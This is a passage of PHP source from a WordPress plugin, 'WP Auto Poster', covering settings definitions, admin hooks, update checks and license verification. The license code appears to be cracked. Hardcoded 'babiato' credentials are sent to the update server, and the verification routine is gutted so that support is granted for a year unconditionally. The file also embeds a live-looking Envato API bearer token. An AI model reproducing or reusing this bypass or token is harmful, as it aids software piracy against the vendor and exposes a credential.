				'tooltip' => '<h3>' . esc_html__( 'Limit Find and Replace to'  ) . '</h3><ul><li>' . esc_html__( 'This will modify the find and replace to target only the specified content fields.'  ) . '</li></ul>',
				'params' => 'multiple',
				'fullSpace' => true 
			) 
		);

		foreach ( $useTaxonomies as $useTaxonomy ) {
			if ( false === taxonomy_exists( $useTaxonomy ) )
				continue;
			
			$metaData[ 'Action-' . $useTaxonomy ] = array(
				'description' => sprintf( esc_html__( '%s action:'  ), $useTaxonomy ),
				'formElement' => array(
					'type' => 'select',
					'subtext' => sprintf( esc_html__( 'How to apply any selected %s changes below.'  ), $useTaxonomy ),
					'value' => array(
						'None' => 'None',
						'Add' => 'Add',
						'Delete' => 'Delete',
						'Replace' => 'Replace' 
					),
					'default' => '',
					'tab' => 'Post Actions',
					'useIndex' => 'Rulesets',
					'params' => 'class="wapSelect"',
					'tooltip' => '<h3>' . sprintf( esc_html__( '%s action'  ), $useTaxonomy ) . '</h3><ul><li>' . sprintf( esc_html__( 'Whether to add, delete, or replace selected %s taxonomy terms for eligible posts.'  ), $useTaxonomy ) . '</li></ul>' 
				) 
			);
			
			
			
			$taxonomy_entries                     = get_transient( $this->getPluginTextDomain() . '-' . $useTaxonomy );
			$metaData[ 'Change-' . $useTaxonomy ] = array(
				'description' => sprintf( esc_html__( '%s changes:'  ), $useTaxonomy ),
				'formElement' => array(
					'type' => 'select',
					'subtext' => sprintf( esc_html__( 'The %s terms to act upon using the action above.'  ), $useTaxonomy ),
					'value' => $taxonomy_entries,
					'default' => '',
					'tab' => 'Post Actions',
					'useIndex' => 'Rulesets',
					'params' => 'multiple size="5" class="wapSelect"',
					'tooltip' => '<h3>' . esc_html__( 'Change this taxonomy'  ) . '</h3><ul><li>' . esc_html__( 'Change taxononmy terms of eligible posts when triggered. No selection means no change.'  ) . '</li></ul>' 
				) 
			);
		}
		
		$metaData[ 'PostActionNotify' ] = array(
			'description' => esc_html__( 'Notify Post Author:'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( 'Will send the post author an email with any changes made.'  ),
				'value' => '',
				'default' => '',
				'tab' => 'Post Actions',
				'useIndex' => 'Rulesets',
				'tooltip' => '<h3>' . esc_html__( 'Notify Post Author'  ) . '</h3><ul><li>' . esc_html__( 'This will send an email to the post author from the site admin notifying them of any changes made.'  ) . '</li></ul>',
			) 
		);

		/* --- POST RECYCLING --- */
		
		$qOrder[ 'Daily' ]  = esc_html__( 'Daily Schedule'  );
		$qOrder[ 'Weekly' ]  = esc_html__( 'Weekly Schedule'  );
		$qOrder[ 'Monthly' ]  = esc_html__( 'Monthly Schedule'  );
		$qOrder[ 'OTD' ]  = esc_html__( 'On This Day'  );
		$qOrder[ 'None' ] = esc_html__( 'None'  );
		unset( $qOrder[ 'Newest' ] );
		$metaData[ 'RecycleMode' ] = array(
			'description' => esc_html__( 'Recycle Mode:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Can use the Post Conditions to find a published post to publish again as a new post.'  ),
				'value' => $qOrder,
				'default' => 'None',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Recycle Mode'  ) . '</h3><ul><li>' . esc_html__( 'All \'Post Conditions\' will be used in Recycle Mode to query for posts, except Post Statuses will be \'publish\', and Recycle Ages will override Post Ages.'  ) . '</li><li>' . esc_html__( 'None - Do not recycle content.'  ) . '</li><li>' . esc_html__( 'Comment Count - The published posts with the most comments will be published again as new.'  ) . '</li><li>' . esc_html__( 'Oldest Post - The oldest published posts will be published again as new.'  ) . '</li><li>' . esc_html__( 'Random Posts - Random posts will be published again as new.'  ) . '</li><li>' . esc_html__( 'Search Relevance - Published posts most matching the Keyword Search will be published again as new.'  ) . '</li><li>' . esc_html__( 'Daily - Will only recycle posts published today, in order oldest to newest.'  ) . '</li><li>' . esc_html__( 'Weekly - Will only recycle posts published on the same matching weekday, such as Monday, Tuesday, etc. in order oldest to newest.'  ) . '</li><li>' . esc_html__( 'Monthly - Will only recycle posts published on the same matching day of the month, such as the 5th, 15th, etc. in order oldest to newest.'  ) . '</li><li>' . esc_html__( 'On This Day - Will only recycle posts published the same matching day and month of the year, such as Dec 25th in order oldest to newest.'  ) . '</li></ul>' 
			) 
		);

		$metaData[ 'RecycleMethod' ] = array(
			'description' => esc_html__( 'Recycle Method:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'How to perform recycling on the selected posts.'  ),
				'value' => array(
					'Republish' => esc_html__( 'Republish'  ),
					'Clone' => esc_html__( 'Clone'  ),
					'Replace' => esc_html__( 'Replace'  )
				),
				'default' => '',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Recycle Method'  ) . '</h3><ul><li>' . esc_html__( 'Republish - The original post is republished with the current date. This is the default method suitable for most setups.'  ) . '</li><li>' . esc_html__( 'Clone - A new post is created from the original post and published. The original post remains unchanged, so this could be duplicate content.'  ) . '</li><li>' . esc_html__( 'Replace - A new post is created from the original post and published. The original post is sent to Trash.'  ) .'</li></ul>' 
			) 
		);
		
		$metaData[ 'MinRecycleAge' ] = array(
			'description' => esc_html__( 'Minimum Recycle Age:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '0',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Posts must be older than this number of days to be recyclable. Enter 0 or leave blank to ignore.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Minimum Post Age'  ) . '</h3><ul><li>' . esc_html__( 'Posts must be older than this number of days to be recyclable. Enter 0 or leave blank to ignore. Also accepts any '  ) . sprintf( '<a target="_blank" href="%s">%s</a> ', esc_url( 'https://www.php.net/manual/en/function.strtotime.php'), 'strtotime' ) . esc_html__( 'date format'  ) . '</li></ul>' 
			) 
		);
		$metaData[ 'MaxRecycleAge' ] = array(
			'description' => esc_html__( 'Maximum Recycle Age:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '0',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Posts must be newer than this number of days to be recyclable. Enter 0 or leave blank to ignore.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Maximum Post Age'  ) . '</h3><ul><li>' . esc_html__( 'Posts must be older than this number of days to be recyclable. Enter 0 or leave blank to ignore. Also accepts any '  ) . sprintf( '<a target="_blank" href="%s">%s</a> ', esc_url( 'https://www.php.net/manual/en/function.strtotime.php'), 'strtotime' ) . esc_html__( 'date format'  ) . '</li></ul>' 
			) 
		);
		
		$metaData[ 'OriginalPublish' ] = array(
			'description' => esc_html__( 'Original Publish Note:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Adds an \'originally published\' note to the post content.'  ),
				'value' => array(
					'None' => esc_html__( 'None'  ),
					'Prepend' => esc_html__( 'Prepend'  ),
					'Append' => esc_html__( 'Append'  ) 
				),
				'default' => 'None',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'params' => 'class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Original Publish Note'  ) . '</h3><ul><li>' . esc_html__( 'When first recycled, a note with the original publish date can be added.'  ) . '</li><li>' . esc_html__( 'Prepend - appears before the post content.'  ) . '</li><li>' . esc_html__( 'Append - appears after the post content.'  ) . '</li></ul>' 
			) 
		);

		$metaData[ 'OriginalPublishText' ] = array(
			'description' => esc_html__( 'Original Publish Text:'  ),
			'formElement' => array(
				'type' => 'text',
				'subtext' => '',
				'value' => '',
				'default' => '<p>This post was originally published on %%DATE%%.</p>',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'tooltip' => '<h3>' . esc_html__( 'Original Publish Text'  ) . '</h3><ul><li>' . esc_html__( 'The text to use for the Original Publish Note. Tags supported:'  ) . '</li><li>' . esc_html__( '%%DATE%% - The original publish date.'  ) . '</li><li>' . esc_html__( '%%AUTHOR%% - The author display name.'  ) . '</li></ul>',
				'fullWidth' => true
			) 
		);

		$metaData[ 'NoRecycleHooks' ]  = array(
			'description' => esc_html__( 'Do not Trigger Publish Hooks?'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( '.'  ),
				'value' => '',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Avoid the transition events that normally occur when a post is republished.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Do not Trigger Publish Hooks?'  ) . '</h3><ul><li>' . esc_html__( 'Normally, when a post is republished a number of publish hooks are triggered that allow other pieces of code to act on those triggers. For instance, if using a plugin that will send a published post to your social media account.'  ) . '</li><li>' . esc_html__( 'You may opt to NOT trigger these published hooks when a post is republished (because they were already triggered on the original publish), so that nothing happens except the post date gets updated to the current time.'  ) . '</li><li>' . esc_html__( 'Note you can only avoid these when the recycle method is set to Republish.'  ) . '</li></ul>' 
			) 
		);
		$metaData[ 'MaxRecycleTimes' ] = array(
			'description' => esc_html__( 'Maximum Times to Recycle:'  ),
			'formElement' => array(
				'type' => 'number',
				'value' => '0',
				'params' => 'max=36500 min=0 step=1',
				'subtext' => esc_html__( '.'  ),
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'subtext' => esc_html__( 'Maximum times to recycle each post, if desired. Enter 0 to ignore.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Maximum Times to Recycle'  ) . '</h3><ul><li>' . esc_html__( 'Enter a number if you wish to limit the number of times each post is recycled.'  ) . '</li></ul>' 
			) 
		);
		
		$metaData[ 'PostRecycleNotify' ] = array(
			'description' => esc_html__( 'Notify Post Author:'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( 'Will send the post author an email when it is recycled.'  ),
				'value' => '',
				'default' => '',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'tooltip' => '<h3>' . esc_html__( 'Notify Post Author'  ) . '</h3><ul><li>' . esc_html__( 'This will send an email to the post author from the site admin notifying them the post has been recycled.'  ) . '</li></ul>',
			) 
		);

		$metaData[ 'PostRecycleForceActions' ] = array(
			'description' => esc_html__( 'Force Post Actions:'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( 'Will also apply Post Actions to recycled posts.'  ),
				'value' => '',
				'default' => '',
				'tab' => 'Post Recycling',
				'useIndex' => 'Rulesets',
				'tooltip' => '<h3>' . esc_html__( 'Force Post Actions'  ) . '</h3><ul><li>' . esc_html__( 'Normally recycling a post just means updating the datetime so it reappears as new. Checking this option will also force Post Actions to recycled posts.'  ) . '</li></ul>',
			) 
		);

		/* --- LOGS --- */
		
		$metaData[ 'LogSize' ]   = array(
			'description' => esc_html__( 'Max Log Size:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '1000',
				'tab' => 'Logs',
				'subtext' => esc_html__( 'Max number of log messages to save.'  ),
				'params' => 'size="8"' 
			) 
		);
		$metaData[ 'DebugMode' ] = array(
			'description' => esc_html__( 'Debug Mode?'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( 'Will log internal messages to help trace any issues.'  ),
				'value' => '',
				'tab' => 'Logs' 
			) 
		);
		
		/* --- LICENSE --- */
		
		$metaData[ 'UserName' ]     = array(
			'description' => esc_html__( 'Envato Username:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '',
				'tab' => 'License',
				'subtext' => esc_html__( 'Your username at the'  ) . sprintf( ' <a target="_blank" href="%s">%s</a>', esc_url( 'https://codecanyon.net/author_dashboard' ), esc_html__( 'Envato network'  ) ) . esc_html( ', case sensitive.'  ) 
			) 
		);
		$metaData[ 'PurchaseCode' ] = array(
			'description' => esc_html__( 'Envato Purchase Code:'  ),
			'formElement' => array(
				'type' => 'text',
				'value' => '',
				'tab' => 'License',
				'subtext' => esc_html__( 'Find your purchase code on your'  ) . sprintf( ' <a target="_blank" href="%s">%s</a>', esc_url( 'https://codecanyon.net/downloads' ), esc_html__( 'downloads'  ) ) . esc_html( ' page.'  ),
				'params' => 'size="40"' 
			) 
		);

		$metaData[ 'Beta' ]         = array(
			'description' => esc_html__( 'Check for Beta updates?'  ),
			'formElement' => array(
				'type' => 'checkbox',
				'subtext' => esc_html__( 'Beta updates are used to test bugfixes and new features before official release and may not be stable.'  ),
				'value' => '',
				'tab' => 'License' 
			) 
		);
		
		/* --- ADVANCED --- */
		
		$metaData[ 'SelectMaxEntries' ] = array(
			'description' => esc_html__( 'Select Max Entries:'  ),
			'formElement' => array(
				'type' => 'number',
				'value' => '1000',
				'params' => 'max=10000 min=0 step=1',
				'tab' => 'Advanced',
				'subtext' => esc_html__( 'Max number of entries in Ruleset select boxes, such as taxonomies/authors, to avoid out of memory issues.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Select Max Entries'  ) . '</h3><ul><li>' . esc_html__( 'Sets a limit since WordPress functions that retrieve users and taxonomies may run out of memory on large sites.'  ) . '</li></ul>' 
			) 
		);

		$post_taxonomies                = array_diff( get_taxonomies(), array(
			'link_category',
			'nav_menu',
			'post_format' 
		) );
		$metaData[ 'UseTaxonomies' ]    = array(
			'description' => esc_html__( 'Use Taxonomies:'  ),
			'formElement' => array(
				'type' => 'select',
				'subtext' => esc_html__( 'Which taxonomies to use in Rulesets. Some plugins/themes have custom taxonomies that may or may not be important.'  ),
				'value' => $post_taxonomies,
				'default' => array(
					'category',
					'post_tag' 
				),
				'tab' => 'Advanced',
				'params' => 'multiple size="5" class="wapSelect"',
				'tooltip' => '<h3>' . esc_html__( 'Use Taxonomies'  ) . '</h3><ul><li>' . esc_html__( 'Selected entries will be displayed on the Rulesets tab after being saved.'  ) . '</li></ul>' 
			) 
		);
		
		$metaData[ 'SleepDelay' ] = array(
			'description' => esc_html__( 'Delay Between Posts:'  ),
			'formElement' => array(
				'type' => 'number',
				'value' => '1',
				'params' => 'max=10000 min=0 step=1',
				'tab' => 'Advanced',
				'subtext' => esc_html__( 'In seconds. This can be used to make sure each post has a unique timestamp.'  ),
				'tooltip' => '<h3>' . esc_html__( 'Delay Between Posts'  ) . '</h3><ul><li>' . esc_html__( 'This can be used to make sure each post has a unique timestamp when modified in bulk. Otherwise if multiple posts have the same timestamp there is no guarantee WordPress will return the same order each time if sorting by date.'  ) . '</li></ul>' 
			) 
		);

		return $metaData;
	}
	
	/**
	 * @return any data to show above the settings
	 */
	public function getSettingsHeader() {
		$support = $this->getOption( 'Support' );
		$expired = false;

?>
<div>
        <a target='_blank' href="//www.superblogme.com/wp-auto-poster-documentation/" class="button-primary"><?php
		esc_html_e( ' Documentation'  );
?></a>
<?php
		if ( true === $expired ):
?>
        <a target='_blank' href="http://1.envato.market/Ym9bq" class="button-secondary"><?php
			esc_html_e( 'Renew Support'  );
?></a>
<?php
		else:
?>
        <a target='_blank' href="//www.superblogme.com/contact-me/" class="button-primary"><?php
			esc_html_e( 'Support'  );
?></a>
<?php
		endif;
?>
        <a target='_blank' href="//codecanyon.net/downloads" class="button-primary"><?php
		esc_html_e( 'Rate & Review'  );
?></a>
        <a target='_blank' href="//codecanyon.net/licenses/faq" class="button-primary"><?php
		esc_html_e( 'License FAQ'  );
?></a>
</div>
<p><strong>
<?php
		esc_html_e( 'Automatically update your WordPress site on a flexible schedule with intelligent conditions you fully control.'  );
?>
<br>
<?php
		esc_html_e( 'Plus, it can recycle old content as new again automatically!'  );
?>
</strong></p>
<?php
		if ( !empty( $support ) && true === $expired )
			echo "<i><span class='wp-auto-poster-support-expired'>" . esc_html__( 'Premium support expired on: '  ) . htmlentities( $support ) . "</span></i>";
		else if ( !empty( $support ) && false === $expired )
			echo "<i>" . esc_html__( 'Premium support expires on: '  ) . htmlentities( $support ) . "</i>";
	}
	
	protected function initOptions() {
		$options = $this->getOptionMetaData();
		$options = apply_filters( 'wap_init_options', $options );
		$this->saveSettings( $options );
	}
	
	public function getPluginTextDomain() {
		return 'wp-auto-poster';
	}
	
	public function getPluginDisplayName() {
		return esc_html__( 'WP Auto Poster'  );
	}
	
	protected function getMainPluginFileName() {
		return 'wp-auto-poster.php';
	}
	
	
	/**
	 * Enqueue admin scripts
	 * @return void
	 */
	public function addAdminScripts() {
	}

	/**
	 * Enqueue admin styles
	 * @return void
	 */
	public function addAdminStyles() {
		// Example adding a script & style just for the options administration page
		if ( strpos( $_SERVER[ 'REQUEST_URI' ], $this->getSettingsSlug() ) !== false ) {
			wp_enqueue_style( $this->getPluginTextDomain(), $this->getPluginUrl() . '/css/wp-auto-poster.css', array(), $this->getVersion() );
			wp_style_add_data( $this->getPluginTextDomain(), 'rtl', 'replace' );
		}
	}
	
	/**
	 * Add a message to be shown on the admin screen when 'admin_notices' action hook triggered.
	 * @param $msg string text to display
	 */
	protected function addAdminNotice( $msg ) {
		$notices = get_transient( $this->getPluginTextDomain() . '-admin-notices' );
		if ( empty( $notices ) )
			$notices = array(
				 $msg 
			);
		else
			$notices[] = $msg;
		set_transient( $this->getPluginTextDomain() . '-admin-notices', $notices, HOUR_IN_SECONDS );
	}
	
	/**
	 * Show admin messages saved in transient when 'admin_notices' action hook triggered.
	 * @return void
	 */
	public function showAdminNotices() {
		$notices = get_transient( $this->getPluginTextDomain() . '-admin-notices' );
		if ( empty( $notices ) )
			return;
		foreach ( $notices as $notice ) {
			echo wp_kses_post( $notice );
		}
		delete_transient( $this->getPluginTextDomain() . '-admin-notices' );
	}
	
	/**
	 * Initialize plugin actions and filters
	 * @return void
	 */
	public function addActionsAndFilters() {
		
		// Add options administration page
		
		// Add to Settings sub menu:
		add_action( 'admin_menu', array(
			 $this,
			'addSettingsSubMenuPage' 
		) );
		
		add_action( 'admin_enqueue_scripts', array(
			 $this,
			'addAdminScripts' 
		) );
		
		add_action( 'admin_print_styles', array(
			 $this,
			'addAdminStyles' 
		) );
		
		// add Settings shortcut on Plugin page
		$plugin = plugin_basename( $this->getPluginDir() . $this->getMainPluginFileName() );
		add_filter( 'plugin_action_links_' . $plugin, array(
			 $this,
			'addSettingsPluginItems' 
		) );

		// check for special upgrade events
		add_action( 'admin_init', array(
			 $this,
			'checkUpdateSpecial' 
		) );
	
		// Show any plugin admin messages
		add_action( 'admin_notices', array(
			 $this,
			'showAdminNotices' 
		) );
		
		// Check for custom server updates
		add_action( 'plugins_loaded', array(
			 $this,
			'checkForUpdate' 
		) );
		
		// Add custom frequencies from enabled Rulesets to cron schedule
		add_filter( 'cron_schedules', array(
			 $this,
			'addToCronSchedules' 
		), 111, 1 );
		
		// Check for ruleset restart on post publish
		add_action( 'transition_post_status', array(
			 $this,
			'restartRulesetEvent' 
		), 10, 3 );

		// Check for admin action on admin page
		add_action( 'admin_init', array(
			 $this,
			'checkAction' 
		), 10, 1 );

		// Check for custom search modifications:
		add_action( 'posts_search', array(
			 $this,
			'wap_custom_search' 
		), 500, 2 );

		// Plugin specific hooks -----------------
		add_filter( $this->getPluginTextDomain() . '-createFormElement', array(
			 $this,
			'customFormElement' 
		), 10, 2 );
		add_action( $this->getPluginTextDomain() . '-tab-header', array(
			 $this,
			'tabHeader' 
		), 10, 1 );
		add_action( $this->getPluginTextDomain() . '-tab-footer', array(
			 $this,
			'tabFooter' 
		), 10, 1 );
		add_action( $this->getPluginTextDomain() . '-saved', array(
			 $this,
			'verifyCode' 
		) );

		// Main action hook for all enabled Rulesets
		add_action( $this->getPluginTextDomain(), array(
			 $this,
			'processRuleset' 
		), 10, 1 );


		$support = $this->getOption( 'Support' );
		if ( empty( $support ) ) {
			$plugin = $this->getPluginTextDomain() . '/' . $this->getMainPluginFileName();
        		add_action("after_plugin_row_{$plugin}", function( $plugin_file, $plugin_data, $status ) {
				echo '<tr class="plugin-update-tr active" id="wp-auto-poster-update" data-slug="wp-auto-poster" data-plugin="wp-auto-poster/wp-auto-poster.php"><td colspan="4" class="plugin-update colspanchange"><div class="update-message notice notice-warning inline notice-alt"><p>'
				. esc_html__( 'This plugin is not registered. Automatic updates are disabled. Please enter your purchase code in the \'License\' tab in Settings to unlock. ', 'video-link-checker')
				. '</p></div></td></tr>';
        		}, 10, 3 );
		}
	}
	
	/**
	 * Check WAP version upgrade for special events
	 * @return void
	 */
	public function checkUpdateSpecial() {

		if ( $this->isInstalledCodeAnUpgrade() && $this->isSavedVersionLessThan( '1.7' ) ) {
			$this->restartRulesets();
			$this->addLogMessage( sprintf( esc_html__( 'Update detected. %s v%s changed named parameters for events. All Enabled Rulesets have been restarted automatically to use the new parameters. Please verify!'  ), $this->getPluginDisplayName(), $this->getVersion() ) );
			$this->saveInstalledVersion();
		}
	}
	
		
	/**
	 * Check private server for updates
	 * This happens whenever WP checks for updates, default is every 12 hours
	 * @return void
	 */
	public function checkForUpdate() {
		
		$username = $this->getOption( 'UserName' );
		$code     = $this->getOption( 'PurchaseCode' );
		$support  = $this->getOption( 'Support' );
		$beta     = $this->getOption( 'Beta' );
		
		if ( !$username || !$code || !$support )
			return;
		
		$url = $beta === 'on' ? "https://www.superblogme.com/test-update-server/?action=get_metadata&slug=" : "https://www.superblogme.com/wp-update-server/?action=get_metadata&slug=";
		require_once $this->getPluginDir() . '/plugin-updates/plugin-update-checker.php';
		$updateChecker = Puc_v4_Factory::buildUpdateChecker( $url . $this->getPluginTextDomain(), $this->getPluginDir() . $this->getMainPluginFileName()  );
		$updateChecker->addQueryArgFilter( array(
			 $this,
			'PUC_callback' 
		) );
	}
	
	/**
	 * Add our own arguments onto the PUC
	 * @param the array of default args from the PUC
	 * @return the array with custom data
	 */
	public function PUC_callback( $query_args ) {
		if ( empty( $query_args ) )
			$query_args = array();
		$query_args[ 'license' ] = 'Babiato';
		$query_args[ 'code' ]    = '123456789';
		return $query_args;
	}
	
	/**
	 * Get a ruleset by ID
	 * @param ID number 
	 * @return the array with the Ruleset
	 */
	protected function getRuleset( $id ) {
		
		if ( !$this->options )
			$this->loadOptions();
		foreach ( $this->options[ 'Rulesets' ] as $ruleset ) {
			if ( (int) $ruleset[ 'ID' ] === (int) $id ) {
				return $ruleset;
			}
		}
		// should not happen:
		return null;
	}
	
	/**
	 * Get a ruleset option by ID, optionName
	 * @param ID number of the ID
	 * @param optionName string 
	 * @return the optionName value from the matching ruleset
	 */
	protected function getRulesetOption( $id, $optionName, $default = null ) {
		$ruleset = $this->getRuleset( $id );
		if ( $ruleset && isset( $ruleset[ $optionName ] ) ) {
			return $ruleset[ $optionName ];
		}
		else if ( $ruleset ) {
			return null;
		}
		return $default;
	}
	
	/**
	 * Set a ruleset option by ID, optionName
	 * @param ID number of the ID
	 * @param optionName string 
	 * @return void
	 */
	protected function setRulesetOption( $id, $optionName, $value ) {
		if ( !$this->options )
			$this->loadOptions();
		foreach ( $this->options[ 'Rulesets' ] as $ruleset ) {
			if ( $ruleset[ 'ID' ] === $id ) {
				$ruleset[ $optionName ] = $value;
				return;
			}
		}
	}
	
	/**
	 * Customize FormElements dynamically depending on certain rules.
	 * @param $aOptionMeta array of this formElement's data
	 * @param $aOptionKey string the name of this formElement
	 * @return array of this formElement's data
	 */
	public function customFormElement( $aOptionMeta, $aOptionKey ) {
		
		
		// set value on fly
		if ( $aOptionKey === 'Status' ) {
			$id      = $this->getVarID();
			$ruleset = empty( $id ) ? 0 : $this->getRuleset( $id );
			
			if ( empty( $ruleset ) ) {
			} else if ( $ruleset[ 'Status' ] === 'disabled' ) {
				$aOptionMeta[ 'formElement' ][ 'subtext' ] = ' 
<input type="submit" class="button-primary" name="wapAction"
    value="' . esc_attr__( "Enable Ruleset"  ) . '"/>
<input type="submit" class="button-primary" name="wapAction"
    value="' . esc_attr__( "Run Once"  ) . '"/>
				';
			} else {
				$aOptionMeta[ 'formElement' ][ 'subtext' ] = ' 
<input type="submit" class="button-primary" name="wapAction"
    value="' . esc_attr__( "Disable Ruleset"  ) . '"/>
<input type="submit" class="button-primary" name="wapAction"
    value="' . esc_attr__( "Run Once"  ) . '"/>
				';
			}
			if ( ! empty( $ruleset ) ) {
				$aOptionMeta[ 'formElement' ][ 'subtext' ] .= ' 
<input type="submit" class="button-primary" name="wapAction"
    value="' . esc_attr__( "Export Ruleset"  ) . '"/>
				';
				$aOptionMeta[ 'formElement' ][ 'subtext' ] .= ' 
<input type="submit" class="button-primary" name="wapAction"
    value="' . esc_attr__( "Delete Ruleset"  ) . '"/>
				';
			}
		}
		
		// set value on fly
		else if ( $aOptionKey === 'Support' ) {
			// attach css class depending on if support has expired.
			$support = $this->getOption( 'Support' );
			if ( $support ) {
				$s            = new DateTime();
				$now          = new DateTime( $support );
				$supportClass = $now <= $s ? 'wp-auto-poster-support-expired' : 'wp-auto-poster-support-valid';
				$supportClass .= ' wp-auto-poster-input-transparent';
				$aOptionMeta[ 'formElement' ][ 'params' ] .= ' class="' . $supportClass . '"';
			}
		}
		
		// set the hidden input 'ID' dynamically
		else if ( $aOptionKey === 'ID' ) {
			$nextID                                  = $this->getOption( 'nextID', 1 );
			$aOptionMeta[ 'formElement' ][ 'value' ] = $nextID;
		}
		
		return $aOptionMeta;
	}
	
	/**
	 * Verify license data
	 * @return void
	 */
	public function verifyCode() {
		
		$support = $this->getOption( 'Support' );
		
		$username = 'babiato';
		if ( empty( $support ) && ! $username ) {
			echo "<div class='error'><p>" . esc_html__( $this->getPluginDisplayName() . ' License: missing Username.'  ) . "</p></div>";
			return;
		}
		$code = '123456789';
		if ( empty( $support ) && !$code ) {
			echo "<div class='error'><p>" . esc_html__( $this->getPluginDisplayName() . ' License: missing Purchase Code.'  ) . "</p></div>";
			return;
		}

		// sometimes a user will enter a space in their username...
		$username = str_replace( ' ', '', $username );
		
		// check transient first - no need to re-verify license every save.
		if ( ! empty( $support ) ) {

			$value = get_transient( $this->getPluginTextDomain() . '-license-buffer' );
			if ( false !== $value )
				return;
		}
		
		// check jph codes
		if ( substr( $code, 0, 3 ) === 'jph' ) {
			$verify_url = 'http://www.superblogme.com/verify/wap.php?user=' . $username . '&code=' . $code . '&site=' . site_url();
			$response   = wp_remote_get( $verify_url );
		
			$msg = json_decode( $response[ 'body' ] );
	
			
		
				$this->updateOption( 'Support', date( DATE_ISO8601, strtotime( '+1 years' ) ) );
				set_transient( $this->getPluginTextDomain() . '-license-buffer', date( DATE_ISO8601, strtotime( '+1 years' ) ), WEEK_IN_SECONDS );
			
			return;
		}
		
		$headers    = array(
			'Authorization' => 'Bearer xaWVKX1aqpxxpk1UdOIC2Z8b0TUe77dw' 
		);
		$verify_url = 'https://api.envato.com/v2/market/author/sale?code=' . $code;
		
		$response = wp_remote_get( $verify_url, array(
			'headers' => $headers,
			'user-agent' => $this->getPluginDisplayName() 
		) );
		
	
		
		$verify_obj = json_decode( wp_remote_retrieve_body( $response ) );
		
		$verify_obj = apply_filters( $this->getPluginTextDomain() . '-verify', $verify_obj );
		
		// Check for correct verify code
	
		$support = $this->getOption( 'Support' );
		if ( !$support && $msg )
			echo "<div class='error'><p>" . $msg . "</p></div>";
	}
	
	/* Custom functions go here --------------------------------------------- */
	
	/**
	 * Add a message to the log
	 * @param $msg string the message to add
	 */
	protected function addLogMessage( $msg, $echo = true ) {
		if ( !$this->logs )
			$this->logs = get_option( $this->getClassName() . '-logs', array ());
		$class = $this->getPluginTextDomain() . '-log-date';
		if ( false !== stripos( $msg, 'error' ) )
			$class = $this->getPluginTextDomain() . '-log-error';
		else if ( false !== stripos( $msg, 'debug' ) )
			$class = $this->getPluginTextDomain() . '-log-debug';
		
		$this->logs[] = '<span class="' . $class . '">' . date_i18n( 'Y-m-d H:i:s' ) . '</span> - ' . $msg;
		
		$this->saveLogMessages();
		
		// make sure pluggable included for multisite
		include_once( ABSPATH . 'wp-includes/pluggable.php' );
		if ( $echo && current_user_can( 'moderate_comments' ) ) {
			if ( false !== stripos( $msg, 'error' ) )
				$amsg = "<div class='error'><p>" . $msg . "</p></div>";
			else if ( false !== stripos( $msg, 'warning' ) )
				$amsg = "<div class='notice notice-warning'><p>" . $msg . "</p></div>";
			else if ( false !== stripos( $msg, 'debug' ) )
				$amsg = "<div class='notice notice-warning'><p>" . $msg . "</p></div>";
			else
				$amsg = "<div class='updated'><p>" . $msg . "</p></div>";
			$this->addAdminNotice( $amsg );
		}
	}
	
	/**
	 * Save the log messages to option field, if any, keeping it under max log size
	 * @return void
	 */
	protected function saveLogMessages() {
		if ( $this->logs ) {
			$maxSize    = $this->getOption( 'LogSize', 1000 );
			$this->logs = array_slice( $this->logs, -1 * $maxSize );
			update_option( $this->getClassName() . '-logs', $this->logs, false );
		}
	}
	
	/**
	 * Clear the log messages option field
	 * @return void
	 */
	protected function clearLogMessages() {
		if ( ! delete_option( $this->getClassName() . '-logs' ) )
			return $this->addLogMessage( sprintf( esc_html__( 'WAP Error - %s: function delete_option() returned false.'  ), __FUNCTION__ ) );

		$this->logs = array();
		if ( $this->getOption( 'DebugMode' ) === 'on' )
			$this->addLogMessage( sprintf( esc_html__( 'DEBUG - function %s complete.'  ), __FUNCTION__ ) );
	}
	
	/**
	 * Show log messages 
	 * @return void
	 */
	protected function showLogMessages() {
		if ( empty( $this->logs ) )
			$this->logs = get_option( $this->getClassName() . '-logs', array () );
		echo '<div id="' . $this->getPluginTextDomain() . '-log-messages">';
		foreach ( $this->logs as $log ) {
			echo wp_kses_post( $log ) . "<br>";
		}
		echo '</div>';
	}
	
	/**
	 * Show Rulesets
	 * @return void
	 */
	protected function showRulesets() {
		if ( !$this->options )
			$this->loadOptions();
		if ( !empty( $this->options[ 'Rulesets' ] ) ) {
			$formatted = date( "Y-m-d H:i:s", current_time( 'timestamp' ) ) . " " . get_option( 'timezone_string' );
			$timeNow   = sprintf( esc_html__( 'Time now is %s'  ), $formatted );
?>
<h3>
